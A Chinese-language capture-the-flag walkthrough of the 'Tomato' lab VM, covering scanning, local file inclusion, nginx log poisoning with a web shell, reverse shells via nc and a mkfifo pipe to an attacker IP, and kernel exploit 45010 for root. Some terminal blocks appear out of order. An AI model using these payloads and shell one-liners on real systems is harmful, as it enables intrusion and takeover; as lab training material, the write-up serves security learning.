tomato WP&复盘

这台靶机挺有意思，所以做个复盘
日志文件包含
内核（双定位）提权

nmap

端口扫描：

1. ┌──(kali㉿kali)-[~/Redteam/replay/tomato]
2. └─$ nmap -sT -p- 10.10.10.147 -oA nmapscan/ports
3. Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-23 22:37 EDT
4. Nmap scan report for 10.10.10.147
5. Host is up (0.019s latency).
6. Not shown: 65531 closed tcp ports (conn-refused)
7. PORT     STATE SERVICE
8. 21/tcp   open  ftp
9. 80/tcp   open  http
10. 2211/tcp open  emwin
11. 8888/tcp open  sun-answerbook
12. MAC Address: 00:0C:29:8E:81:3B (VMware)
14. Nmap done: 1 IP address (1 host up) scanned in 5.74 seconds

复制代码

tcp详细扫描：

1. ┌──(kali㉿kali)-[~/Redteam/replay/tomato]
2. └─$ nmap -sT -sC -sV -O -p21,80,2211,8888 10.10.10.147 -oA nmapscan/details
3. Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-23 22:38 EDT
4. Nmap scan report for 10.10.10.147
5. Host is up (0.0013s latency).
7. PORT     STATE SERVICE VERSION
8. 21/tcp   open  ftp     vsftpd 3.0.3
9. 80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
10. |_http-server-header: Apache/2.4.18 (Ubuntu)
11. |_http-title: Tomato
12. 2211/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
13. | ssh-hostkey:
14. |   2048 d2:53:0a:91:8c:f1:a6:10:11:0d:9e:0f:22:f8:49:8e (RSA)
15. |   256 b3:12:60:32:48:28:eb:ac:80:de:17:d7:96:77:6e:2f (ECDSA)
16. |_  256 36:6f:52:ad:fe:f7:92:3e:a2:51:0f:73:06:8d:80:13 (ED25519)
17. 8888/tcp open  http    nginx 1.10.3 (Ubuntu)
18. |_http-title: 401 Authorization Required
19. | http-auth:
20. | HTTP/1.1 401 Unauthorized\x0D
21. |_  Basic realm=Private Property
22. |_http-server-header: nginx/1.10.3 (Ubuntu)
23. MAC Address: 00:0C:29:8E:81:3B (VMware)
24. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
25. Device type: general purpose
26. Running: Linux 3.X|4.X
27. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
28. OS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16
29. Network Distance: 1 hop
30. Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
32. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
33. Nmap done: 1 IP address (1 host up) scanned in 13.23 seconds

复制代码

这里的信息有一个很有意思的地方：可以看到80端口用的是apache,但是8080的代理用的是nginx
脚本扫描：

1. ┌──(kali㉿kali)-[~/Redteam/replay/tomato]
2. └─$ nmap --script=vuln -p21,80,2211,8888 10.10.10.147 -oA nmapscan/vuln
3. Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-23 22:38 EDT
4. Nmap scan report for 10.10.10.147
5. Host is up (0.00086s latency).
7. PORT     STATE SERVICE
8. 21/tcp   open  ftp
9. 80/tcp   open  http
10. |_http-csrf: Couldn't find any CSRF vulnerabilities.
11. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
12. |_http-dombased-xss: Couldn't find any DOM based XSS.
13. 2211/tcp open  emwin
14. 8888/tcp open  sun-answerbook
15. MAC Address: 00:0C:29:8E:81:3B (VMware)
17. Nmap done: 1 IP address (1 host up) scanned in 321.34 seconds

复制代码

判断渗透优先级

1：ftp匿名访问
2:   80端口
3：8888
4:   2211
start

ftp匿名访问：

1. ┌──(kali㉿kali)-[~/Redteam/replay/tomato]
2. └─$ ftp 10.10.10.147
3. Connected to 10.10.10.147.
4. 220 (vsFTPd 3.0.3)
5. Name (10.10.10.147:kali): anonymous
6. 331 Please specify the password.
7. Password:
8. 530 Login incorrect.
9. ftp: Login failed
10. ftp>

复制代码

匿名访问失败
80：
目录扫描，这里注意，一般来说，当找不到一点思路的时候，大部分情况都是信息收集没到位，我做的时候好久没遇到过gobuster扫不出来的情况，又懒的开别的扫描了，导致很久没有撕开口子
gobuster：

1. ┌──(kali㉿kali)-[~/Redteam/replay/tomato]
2. └─$ gobuster dir -u http://10.10.10.147/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,bak,html
3. ===============================================================
4. Gobuster v3.6
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://10.10.10.147/
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.6
13. [+] Extensions:              php,txt,bak,html
14. [+] Timeout:                 10s
15. ===============================================================
16. Starting gobuster in directory enumeration mode
17. ===============================================================
18. /.php                 (Status: 403) [Size: 277]
19. /index.html           (Status: 200) [Size: 652]
20. /.html                (Status: 403) [Size: 277]
21. /.php                 (Status: 403) [Size: 277]
22. /.html                (Status: 403) [Size: 277]
23. /server-status        (Status: 403) [Size: 277]
24. Progress: 1102800 / 1102805 (100.00%)
25. ===============================================================
26. Finished
27. ===============================================================

复制代码

dirsearch:

1. ┌──(kali㉿kali)-[~/Redteam/replay/tomato]
2. └─$ dirsearch -u http://10.10.10.147
3. /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
4.   from pkg_resources import DistributionNotFound, VersionConflict
6.   _|. _ _  _  _  _ _|_    v0.4.3
7. (_||| _) (/_(_|| (_| )
9. Extensions: php, aspx, jsp, html, js
10. HTTP method: GET | Threads: 25
11. Wordlist size: 11460
13. Output File: /home/kali/Redteam/replay/tomato/reports/http_10.10.10.147/_25-09-23_22-56-41.txt
15. Target: http://10.10.10.147/
17. [22:56:41] Starting:
18. [22:56:44] 403 -  277B  - /.ht_wsr.txt
19. [22:56:44] 403 -  277B  - /.htaccess.sample
20. [22:56:44] 403 -  277B  - /.htaccess.bak1
21. [22:56:44] 403 -  277B  - /.htaccess.save
22. [22:56:44] 403 -  277B  - /.htaccess.orig
23. [22:56:44] 403 -  277B  - /.htaccess_extra
24. [22:56:44] 403 -  277B  - /.htaccess_orig
25. [22:56:44] 403 -  277B  - /.htaccessOLD2
26. [22:56:44] 403 -  277B  - /.htaccessBAK
27. [22:56:44] 403 -  277B  - /.htaccessOLD
28. [22:56:44] 403 -  277B  - /.htaccess_sc
29. [22:56:44] 403 -  277B  - /.htm
30. [22:56:44] 403 -  277B  - /.html
31. [22:56:44] 403 -  277B  - /.htpasswd_test
32. [22:56:44] 403 -  277B  - /.htpasswds
33. [22:56:44] 403 -  277B  - /.httr-oauth
34. [22:56:46] 403 -  277B  - /.php3
35. [22:56:46] 403 -  277B  - /.php
36. [22:57:52] 403 -  277B  - /server-status
37. [22:57:52] 403 -  277B  - /server-status/
39. Task Completed

复制代码

dirb：

1. ┌──(kali㉿kali)-[~/Redteam/replay/tomato]
2. └─$ dirb http://10.10.10.147/ -f
4. -----------------
5. DIRB v2.22   
6. By The Dark Raver
7. -----------------
9. START_TIME: Tue Sep 23 22:56:32 2025
10. URL_BASE: http://10.10.10.147/
11. WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
12. OPTION: Fine tunning of NOT_FOUND detection
14. -----------------
16. GENERATED WORDS: 4612                                                         
18. ---- Scanning URL: http://10.10.10.147/ ----
19. ==> DIRECTORY: http://10.10.10.147/antibot_image/                                             
20. + http://10.10.10.147/index.html (CODE:200|SIZE:49)                                          
21. + http://10.10.10.147/server-status (CODE:403|SIZE:277)                                       
22.                                                                                              
23. ---- Entering directory: http://10.10.10.147/antibot_image/ ----
24. (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
25.     (Use mode '-w' if you want to scan it anyway)
26.                                                                               
27. -----------------
28. END_TIME: Tue Sep 23 22:56:51 2025
29. DOWNLOADED: 4612 - FOUND: 2

复制代码

访问扫出来的目录：

逐个进去翻翻

在info.php提示文件包含
查看phpinfo的关键配置项：
这里复习一下：

允许远程包含（关键项）
allow_url_include = On  // 危险！允许远程文件包含
On: 允许包含远程文件（如http://evil.com/shell.txt）
Off: 只能包含本地文件（默认安全）
允许URL打开（前提条件）

allow_url_fopen = On/Off
即使allow_url_include=On，如果此项为Off，远程包含也可能失败

• 文件包含相关配置
  包含路径设置
  include_path = ".:/php/includes"
  查看PHP搜索包含文件的默认路径
  

攻击者可能利用路径遍历
开放basedir限制

open_basedir = /var/www/html
如果设置，PHP只能访问指定目录下的文件

未设置或设置过宽会增加风险

include off，无法远程包含

文件包含概率增加
尝试本地文件包含
/etc/passwd:

/etc/shadow包含失败
尝试日志文件包含
这里很有意思的是，由于我们现在访问的是80端口，80端口开放的是Apache，然后我就尝试apache可能有的日志文件名，比如/var/log/apache/access.log,/var/log/apache2/access.log,/var/log/httpd/access.log
均利用失败，然后我突然想到8888端口用的是nginx服务，这两个web服务也有存在交互的可能性，于是尝试/var/log/nginx/access.log

没想到真的包含成功了
这里要注意，包含的是8888开的服务的日志，所以要注入木马就得在8888请求（之前就忘了，在80端口注入了半天没反应）
这里按照之前在DC-5的经验在user-agent注入DC-5复盘笔记 - Ex1st - 博客园
在hackbar操作：

回到80端口，在被包含的日志的最后一条看到：

这里只回显了ooooops，说明木马已经成功的被解析了
打开蚁剑

连接成功
打开虚拟终端，进行反弹shell
虚拟终端：

1. 当前用户: www-data
2. (*) 输入 ashelp 查看本地命令
3. (www-data:/var/www/html/antibot_image/antibots) $ nc -e /bin/bash 10.10.10.128 1234
4. nc: invalid option -- 'e'
5. This is nc from the netcat-openbsd package. An alternative nc is available
6. in the netcat-traditional package.
7. usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
8.       [-P proxy_username] [-p source_port] [-q seconds] [-s source]
9.       [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
10.       [-x proxy_address[:port]] [destination] [port]
11. (www-data:/var/www/html/antibot_image/antibots) $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.128 1234 >/tmp/f

复制代码

攻击机成功反弹shell,拿到初始www-data权限

1. ┌──(kali㉿kali)-[~]
2. └─$ nc -lvnp 1234         
3. listening on [any] 1234 ...
4. connect to [10.10.10.128] from (UNKNOWN) [10.10.10.147] 35648
5. bash: cannot set terminal process group (818): Inappropriate ioctl for device
6. bash: no job control in this shell
7. www-data@ubuntu:/var/www/html/antibot_image/antibots$   

复制代码

提权

sudo -l:

1. www-data@ubuntu:/var/www/html/antibot_image/antibots$ sudo -l
2. sudo -l
3. sudo: no tty present and no askpass program specified
4. www-data@ubuntu:/var/www/html/antibot_image/antibots$ python -c 'import pty;pty.spawn("/bin/bash")'
5. <ml/antibot_image/antibots$ python -c 'import pty;pty.spawn("/bin/bash")'   
6. The program 'python' can be found in the following packages:
7. * python-minimal
8. * python3
9. Ask your administrator to install one of them
10. www-data@ubuntu:/var/www/html/antibot_image/antibots$ which python3
11. which python3
12. /usr/bin/python3
13. www-data@ubuntu:/var/www/html/antibot_image/antibots$ python3 -c 'import pty;pty.spawn("/bin/bash")'
14. <ml/antibot_image/antibots$ python3 -c 'import pty;pty.spawn("/bin/bash")'   
15. www-data@ubuntu:/var/www/html/antibot_image/antibots$ sudo -l
16. sudo -l
17. [sudo] password for www-data:

复制代码

定时任务，内核版本：

1. www-data@ubuntu:/var/www/html/antibot_image/antibots$ find / -perm -u=s -type f 2>/dev/null
2. <ml/antibot_image/antibots$ find / -perm -u=s -type f 2>/dev/null            
3. /bin/ntfs-3g
4. /bin/su
5. /bin/ping6
6. /bin/fusermount
7. /bin/mount
8. /bin/ping
9. /bin/umount
10. /usr/lib/openssh/ssh-keysign
11. /usr/lib/eject/dmcrypt-get-device
12. /usr/lib/dbus-1.0/dbus-daemon-launch-helper
13. /usr/bin/chsh
14. /usr/bin/sudo
15. /usr/bin/gpasswd
16. /usr/bin/newgrp
17. /usr/bin/passwd
18. /usr/bin/chfn
19. /usr/bin/vmware-user-suid-wrapper
20. www-data@ubuntu:/var/www/html/antibot_image/antibots$

复制代码

内核版本较低
查看普通用户文件：

1. www-data@ubuntu:/var/www/html/antibot_image/antibots$ find / -writable -type f ! -path '/proc/*' 2>/dev/null
2. < find / -writable -type f ! -path '/proc/*' 2>/dev/null                     
3. /var/log/nginx/error.log
4. /var/log/nginx/access.log
5. /var/log/auth.log
6. /tmp/a.out
7. /sys/fs/cgroup/memory/cgroup.event_control
8. /sys/kernel/security/apparmor/.access
9. /sys/kernel/security/apparmor/.remove
10. /sys/kernel/security/apparmor/.replace
11. /sys/kernel/security/apparmor/.load

复制代码

这里其实有一个比较有意思的东西：

1. cat /etc/crontab
2. # /etc/crontab: system-wide crontab
3. # Unlike any other crontab you don't have to run the `crontab'
4. # command to install the new version when you edit this file
5. # and files in /etc/cron.d. These files also have username fields,
6. # that none of the other crontabs do.
8. SHELL=/bin/sh
9. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
11. # m h dom mon dow user  command
12. 17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
13. 25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
14. 47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
15. 52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
16. #
17. www-data@ubuntu:/var/www/html/antibot_image/antibots$ uname -a
18. uname -a
19. Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

复制代码

这里有个.wget-hsts，查了一下AI发现，
这是一个HSTS文件

什么是HSTS？

• HTTP严格传输安全协议
  
• 强制浏览器使用HTTPS连接网站
  
• 防止SSL剥离攻击和协议降级
  

Wget的HSTS功能：

• Wget ≥ 1.14版本支持HSTS
  
• 访问过HTTPS网站后会自动记录HSTS信息
  
• 下次访问同一网站时自动使用HTTPS
  

安全意义分析
这个文件告诉你：

• 用户www-data 曾使用wget访问过 www.exploit-db.com
  
• 访问时间大约在2020年9月7日
  
• 使用了HTTPS连接（否则不会记录HSTS）
  
• exploit-db.com 是著名的漏洞利用代码库
  

这个用户曾经在2020年访问过exploit-db.com，
根据这个线索推测，很有可能是利用exploit-db.com的内核脚本提权了
从攻击机传一个linpeas.sh
结合searchsploit对应的内核版本无数次尝试
再靶机崩溃并重置了无数次后，
尝试这个脚本：

由于靶机没有gcc，需要在攻击机上静态编译之后传给靶机
攻击机：

1. www-data@ubuntu:/home$ ls
2. ls
3. tomato
4. www-data@ubuntu:/home$ cd tomato
5. cd tomato
6. www-data@ubuntu:/home/tomato$ ls -al
7. ls -al
8. total 40
9. drwxr-xr-x 5 tomato tomato 4096 Sep  7  2020 .
10. drwxr-xr-x 3 root   root   4096 Sep  7  2020 ..
11. -rw------- 1 tomato tomato   10 Sep  7  2020 .bash_history
12. -rw-r--r-- 1 tomato tomato  220 Sep  7  2020 .bash_logout
13. -rw-r--r-- 1 tomato tomato 3771 Sep  7  2020 .bashrc
14. drwx------ 2 tomato tomato 4096 Sep  7  2020 .cache
15. drwxrwxr-x 2 tomato tomato 4096 Sep  7  2020 .nano
16. -rw-r--r-- 1 tomato tomato  675 Sep  7  2020 .profile
17. drwx------ 2 tomato tomato 4096 Sep  7  2020 .ssh
18. -rw-r--r-- 1 tomato tomato    0 Sep  7  2020 .sudo_as_admin_successful
19. -rw-rw-r-- 1 tomato tomato  175 Sep  7  2020 .wget-hsts
20. www-data@ubuntu:/home/tomato$ cat .*
21. cat .*
22. cat: .: Is a directory
23. cat: ..: Is a directory
24. cat: .bash_history: Permission denied
25. # ~/.bash_logout: executed by bash(1) when login shell exits.
27. # when leaving the console clear the screen to increase privacy
29. if [ "$SHLVL" = 1 ]; then
30.     [ -x /usr/bin/clear_console ] && /usr/bin/clear_console -q
31. fi
32. # ~/.bashrc: executed by bash(1) for non-login shells.
33. # see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
34. # for examples
36. # If not running interactively, don't do anything
37. case $- in
38.     *i*) ;;
39.       *) return;;
40. esac
42. # don't put duplicate lines or lines starting with space in the history.
43. # See bash(1) for more options
44. HISTCONTROL=ignoreboth
46. # append to the history file, don't overwrite it
47. shopt -s histappend
49. # for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
50. HISTSIZE=1000
51. HISTFILESIZE=2000
53. # check the window size after each command and, if necessary,
54. # update the values of LINES and COLUMNS.
55. shopt -s checkwinsize
57. # If set, the pattern "**" used in a pathname expansion context will
58. # match all files and zero or more directories and subdirectories.
59. #shopt -s globstar
61. # make less more friendly for non-text input files, see lesspipe(1)
62. [ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
64. # set variable identifying the chroot you work in (used in the prompt below)
65. if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
66.     debian_chroot=$(cat /etc/debian_chroot)
67. fi
69. # set a fancy prompt (non-color, unless we know we "want" color)
70. case "$TERM" in
71.     xterm-color|*-256color) color_prompt=yes;;
72. esac
74. # uncomment for a colored prompt, if the terminal has the capability; turned
75. # off by default to not distract the user: the focus in a terminal window
76. # should be on the output of commands, not on the prompt
77. #force_color_prompt=yes
79. if [ -n "$force_color_prompt" ]; then
80.     if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
81.         # We have color support; assume it's compliant with Ecma-48
82.         # (ISO/IEC-6429). (Lack of such support is extremely rare, and such
83.         # a case would tend to support setf rather than setaf.)
84.         color_prompt=yes
85.     else
86.         color_prompt=
87.     fi
88. fi
90. if [ "$color_prompt" = yes ]; then
91.     PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
92. else
93.     PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
94. fi
95. unset color_prompt force_color_prompt
97. # If this is an xterm set the title to user@host:dir
98. case "$TERM" in
99. xterm*|rxvt*)
100.     PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
101.     ;;
102. *)
103.     ;;
104. esac
106. # enable color support of ls and also add handy aliases
107. if [ -x /usr/bin/dircolors ]; then
108.     test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
109.     alias ls='ls --color=auto'
110.     #alias dir='dir --color=auto'
111.     #alias vdir='vdir --color=auto'
113.     alias grep='grep --color=auto'
114.     alias fgrep='fgrep --color=auto'
115.     alias egrep='egrep --color=auto'
116. fi
118. # colored GCC warnings and errors
119. #export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
121. # some more ls aliases
122. alias ll='ls -alF'
123. alias la='ls -A'
124. alias l='ls -CF'
126. # Add an "alert" alias for long running commands.  Use like so:
127. #   sleep 10; alert
128. alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
130. # Alias definitions.
131. # You may want to put all your additions into a separate file like
132. # ~/.bash_aliases, instead of adding them here directly.
133. # See /usr/share/doc/bash-doc/examples in the bash-doc package.
135. if [ -f ~/.bash_aliases ]; then
136.     . ~/.bash_aliases
137. fi
139. # enable programmable completion features (you don't need to enable
140. # this, if it's already enabled in /etc/bash.bashrc and /etc/profile
141. # sources /etc/bash.bashrc).
142. if ! shopt -oq posix; then
143.   if [ -f /usr/share/bash-completion/bash_completion ]; then
144.     . /usr/share/bash-completion/bash_completion
145.   elif [ -f /etc/bash_completion ]; then
146.     . /etc/bash_completion
147.   fi
148. fi
149. cat: .cache: Permission denied
150. cat: .nano: Is a directory
151. # ~/.profile: executed by the command interpreter for login shells.
152. # This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
153. # exists.
154. # see /usr/share/doc/bash/examples/startup-files for examples.
155. # the files are located in the bash-doc package.
157. # the default umask is set in /etc/profile; for setting the umask
158. # for ssh logins, install and configure the libpam-umask package.
159. #umask 022
161. # if running bash
162. if [ -n "$BASH_VERSION" ]; then
163.     # include .bashrc if it exists
164.     if [ -f "$HOME/.bashrc" ]; then
165.         . "$HOME/.bashrc"
166.     fi
167. fi
169. # set PATH so it includes user's private bin if it exists
170. if [ -d "$HOME/bin" ] ; then
171.     PATH="$HOME/bin:$PATH"
172. fi
173. cat: .ssh: Permission denied
174. # HSTS 1.0 Known Hosts database for GNU Wget.
175. # Edit at your own risk.
176. # <hostname>[:<port>]   <incl. subdomains>      <created>       <max-age>
177. www.exploit-db.com      0       1       1599466767      63072000
178. www-data@ubuntu:/home/tomato$

复制代码

靶机:

1. www-data@ubuntu:/home/tomato$ cat .wget-hsts
2. cat .wget-hsts
3. # HSTS 1.0 Known Hosts database for GNU Wget.
4. # Edit at your own risk.
5. # <hostname>[:<port>]   <incl. subdomains>      <created>       <max-age>
6. www.exploit-db.com      0       1       1599466767      63072000

复制代码

提权成功
反思

1、信息收集一定要有耐心
2、但是因为phpinfo是配置文件就觉得作者在配置文件上留线索的概率低，所以没有注意到源码的注释，以后也要慎重，打靶时任何情况都不能忽略，只是需要一个优先级的选择
3、当时没能快速定位到可利用的脚本
当时打的时候主要是基于内核定位，下次内核利用失败还应该结合linux版本定位

1. ┌──(kali㉿kali)-[~/Redteam/replay/tomato]
2. └─$ gcc -static 45010.c
3.                                                                               
4. ┌──(kali㉿kali)-[~/Redteam/replay/tomato]
5. └─$ ls
6. 45010.c  a.out  nmapscan  reports
7.                                                                               
8. ┌──(kali㉿kali)-[~/Redteam/replay/tomato]
9. └─$ php -S 0:80
10. [Tue Sep 23 23:51:45 2025] PHP 8.4.11 Development Server (http://0:80) started
11. [Tue Sep 23 23:52:35 2025] 10.10.10.147:37340 Accepted
12. [Tue Sep 23 23:52:35 2025] 10.10.10.147:37340 [200]: GET /a.out
13. [Tue Sep 23 23:52:35 2025] 10.10.10.147:37340 Closing

复制代码

可以看到45010两者都符合，所以按照这两个条件定位攻击链可以缩短
以及以后把searchsploit尝试完了再尝试linpeas的，不然两者一起找思路不够清晰

来源：程序园用户自行投稿发布，如果侵权，请联系站长删除
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

这个好，看起来很实用